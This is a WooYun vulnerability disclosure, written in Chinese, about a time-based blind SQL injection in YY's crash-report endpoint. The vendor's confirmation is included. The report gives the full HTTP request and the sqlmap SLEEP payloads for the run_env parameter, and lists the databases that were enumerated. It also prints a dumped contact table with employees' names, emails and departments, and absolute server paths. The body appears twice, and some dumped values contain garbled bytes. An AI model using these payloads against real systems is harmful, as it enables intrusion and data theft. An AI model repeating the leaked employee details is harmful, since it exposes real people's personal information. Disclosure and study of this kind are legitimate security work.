当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0192368

漏洞标题:YY某处盲注2库内含员工姓名邮箱电话号码部门等数据量大绝对路径泄露

相关厂商:广州多玩

漏洞作者: hear7v

提交时间:2016-04-05 16:46

修复时间:2016-05-20 17:30

公开时间:2016-05-20 17:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-05: 细节已通知厂商并且等待厂商处理中
2016-04-05: 厂商已经确认,细节仅向厂商公开
2016-04-15: 细节向核心白帽子及相关领域专家公开
2016-04-25: 细节向普通白帽子公开
2016-05-05: 细节向实习白帽子公开
2016-05-20: 细节向公众公开

简要描述:

YY某处盲注,2库,9000张表,内涵员工姓名,邮箱,电话号码,部门等,数据量大,绝对路径泄露

详细说明:

url:http://crashreport.yy.com/crashreport/crashreport.php
user-agent:YY HD 5.1.0 rv:41 (iPad; iPhone OS 9.2.1; en_CN)
os_ver=%5B9.2.1%5D%5BiPad4.4%5D&report_id=3065462826&type=crash&data:user_discription=%5Byyhd%5D%5B5.1.0.0%5D&run_env=0&custom_property=imei%3D1220B80F-9970-4AC7-8B5C-39D7F29319DF%26nettype%3Dunknown&product_id=yyhd_ios&excep_discription=3065462826&product_ver=5.1.0.0&user_action=close&product_ver_detail=5.1.0.0&excep_module=ios&count_24hour=1
Parameter: run_env (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: os_ver=[9.2.1][iPad4.4]&report_id=3065462826&type=crash&user_discription=[yyhd][5.1.0.0]&run_env=0 AND (SELECT * FROM (SELECT(SLEEP(3)))JUhM)&custom_property=imei=1220B80F-9970-4AC7-8B5C-39D7F29319DF%26nettype=unknown&product_id=yyhd_ios&excep_discription=3065462826&product_ver=5.1.0.0&user_action=close&product_ver_detail=5.1.0.0&excep_module=ios&count_24hour=1
---
web application technology: PHP 5.4.15
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] auditdb
[*] duowan_crashreport
[*] information_schema
web application technology: PHP 5.4.15
back-end DBMS: MySQL 5.0.12
Database: duowan_crashreport
Table: contact
[6 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| contactId | int(10) |
| contactName | varchar(200) |
| department | varchar(200) |
| email | varchar(100) |
| phone | varchar(100) |
| yy | varchar(50) |
+-------------+--------------+
web application technology: PHP 5.4.15
back-end DBMS: MySQL 5.0.12
Database: duowan_crashreport
Table: contact
[11 entries]
+-----------+----------------------+---------+----------------------------+---------------+-------------+
| contactId | yy | phone | email | department | contactName |
+-----------+----------------------+---------+----------------------------+---------------+-------------+
| 48 | 09011098 | <blank> | huqiuyun@yy.com | 客\xe7@\x02端小组 | 胡秋云 |
| 38 | 909010380 | <blank> | huangboxian@yy.co\xf4`\x81 | <blank> | 黄博贤 |
| 42 | 9\x01\x00\x019010432 | <blank> | tanshunwen@yy.com | <blank> | 谭舜文 |
| 53 | 909010621 | <blank> | liujianqiang@yy.com | <blank> | 刘建强 |
| 36 | 909010856 | <blank> | lvsongmei@yy.com | <blank> | 吕松梅 |
| 61 | 909010863 | <blank> | caizhiru@yy.com | <blank> | 蔡智儒 |
| 40 | 909010965 | <blank> | liushenghua@yy.com | <blank> | 刘胜华 |
| 54 | 909011043 | <blank> | yangzhuoyan@yy.com | <blank> | 杨焯砚 |
| 55 | 909011132 | <blank> | dengjiang@yy.com | <blank> | 邓江 |
| 27 | 909011150 | <blank> | hefengzheng@yy.com | 基础产品部 | 贺冯政 |
| 50 | 909011167 | <blank> | luorongzhuan@yy.com | YY娱乐 | 罗荣专 |
+-----------+----------------------+---------+----------------------------+---------------+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: run_env (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: os_ver=[9.2.1][iPad4.4]&report_id=3065462826&type=crash&user_discription=[yyhd][5.1.0.0]&run_env=0 AND (SELECT * FROM (SELECT(SLEEP(5)))JUhM)&custom_property=imei=1220B80F-9970-4AC7-8B5C-39D7F29319DF%26nettype=unknown&product_id=yyhd_ios&excep_discription=3065462826&product_ver=5.1.0.0&user_action=close&product_ver_detail=5.1.0.0&excep_module=ios&count_24hour=1
---
[13:57:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.15
back-end DBMS: MySQL 5.0.12
[13:57:18] [INFO] fetching tables for database: 'duowan_crashreport'
[13:57:18] [INFO] fetching number of tables for database 'duowan_crashreport'
[13:57:18] [INFO] resumed: 8988
[13:57:18] [INFO] resumed: CRASH_FILE_ARC_HIS
[13:57:18] [INFO] resuming partial value: alertconfg_201502
8988张表
/data1/www/crashreport/crash/entertainment
/data1/www/crashreport/crash/tvbar
/data1/www/crashreport/crash/idolshow
绝对路径

漏洞证明:

url:http://crashreport.yy.com/crashreport/crashreport.php
user-agent:YY HD 5.1.0 rv:41 (iPad; iPhone OS 9.2.1; en_CN)
os_ver=%5B9.2.1%5D%5BiPad4.4%5D&report_id=3065462826&type=crash&data:user_discription=%5Byyhd%5D%5B5.1.0.0%5D&run_env=0&custom_property=imei%3D1220B80F-9970-4AC7-8B5C-39D7F29319DF%26nettype%3Dunknown&product_id=yyhd_ios&excep_discription=3065462826&product_ver=5.1.0.0&user_action=close&product_ver_detail=5.1.0.0&excep_module=ios&count_24hour=1
Parameter: run_env (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: os_ver=[9.2.1][iPad4.4]&report_id=3065462826&type=crash&user_discription=[yyhd][5.1.0.0]&run_env=0 AND (SELECT * FROM (SELECT(SLEEP(3)))JUhM)&custom_property=imei=1220B80F-9970-4AC7-8B5C-39D7F29319DF%26nettype=unknown&product_id=yyhd_ios&excep_discription=3065462826&product_ver=5.1.0.0&user_action=close&product_ver_detail=5.1.0.0&excep_module=ios&count_24hour=1
---
web application technology: PHP 5.4.15
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] auditdb
[*] duowan_crashreport
[*] information_schema
web application technology: PHP 5.4.15
back-end DBMS: MySQL 5.0.12
Database: duowan_crashreport
Table: contact
[6 columns]
+-------------+--------------+
| Column | Type |
+-------------+--------------+
| contactId | int(10) |
| contactName | varchar(200) |
| department | varchar(200) |
| email | varchar(100) |
| phone | varchar(100) |
| yy | varchar(50) |
+-------------+--------------+
web application technology: PHP 5.4.15
back-end DBMS: MySQL 5.0.12
Database: duowan_crashreport
Table: contact
[11 entries]
+-----------+----------------------+---------+----------------------------+---------------+-------------+
| contactId | yy | phone | email | department | contactName |
+-----------+----------------------+---------+----------------------------+---------------+-------------+
| 48 | 09011098 | <blank> | huqiuyun@yy.com | 客\xe7@\x02端小组 | 胡秋云 |
| 38 | 909010380 | <blank> | huangboxian@yy.co\xf4`\x81 | <blank> | 黄博贤 |
| 42 | 9\x01\x00\x019010432 | <blank> | tanshunwen@yy.com | <blank> | 谭舜文 |
| 53 | 909010621 | <blank> | liujianqiang@yy.com | <blank> | 刘建强 |
| 36 | 909010856 | <blank> | lvsongmei@yy.com | <blank> | 吕松梅 |
| 61 | 909010863 | <blank> | caizhiru@yy.com | <blank> | 蔡智儒 |
| 40 | 909010965 | <blank> | liushenghua@yy.com | <blank> | 刘胜华 |
| 54 | 909011043 | <blank> | yangzhuoyan@yy.com | <blank> | 杨焯砚 |
| 55 | 909011132 | <blank> | dengjiang@yy.com | <blank> | 邓江 |
| 27 | 909011150 | <blank> | hefengzheng@yy.com | 基础产品部 | 贺冯政 |
| 50 | 909011167 | <blank> | luorongzhuan@yy.com | YY娱乐 | 罗荣专 |
+-----------+----------------------+---------+----------------------------+---------------+-------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: run_env (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: os_ver=[9.2.1][iPad4.4]&report_id=3065462826&type=crash&user_discription=[yyhd][5.1.0.0]&run_env=0 AND (SELECT * FROM (SELECT(SLEEP(5)))JUhM)&custom_property=imei=1220B80F-9970-4AC7-8B5C-39D7F29319DF%26nettype=unknown&product_id=yyhd_ios&excep_discription=3065462826&product_ver=5.1.0.0&user_action=close&product_ver_detail=5.1.0.0&excep_module=ios&count_24hour=1
---
[13:57:18] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.15
back-end DBMS: MySQL 5.0.12
[13:57:18] [INFO] fetching tables for database: 'duowan_crashreport'
[13:57:18] [INFO] fetching number of tables for database 'duowan_crashreport'
[13:57:18] [INFO] resumed: 8988
[13:57:18] [INFO] resumed: CRASH_FILE_ARC_HIS
[13:57:18] [INFO] resuming partial value: alertconfg_201502
8988张表
/data1/www/crashreport/crash/entertainment
/data1/www/crashreport/crash/tvbar
/data1/www/crashreport/crash/idolshow
绝对路径

修复方案:

过滤

版权声明:转载请注明来源 hear7v@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-04-05 17:29

厂商回复:

非常感谢对于欢聚时代安全工作的支持,我们会尽快修复!

最新状态:

暂无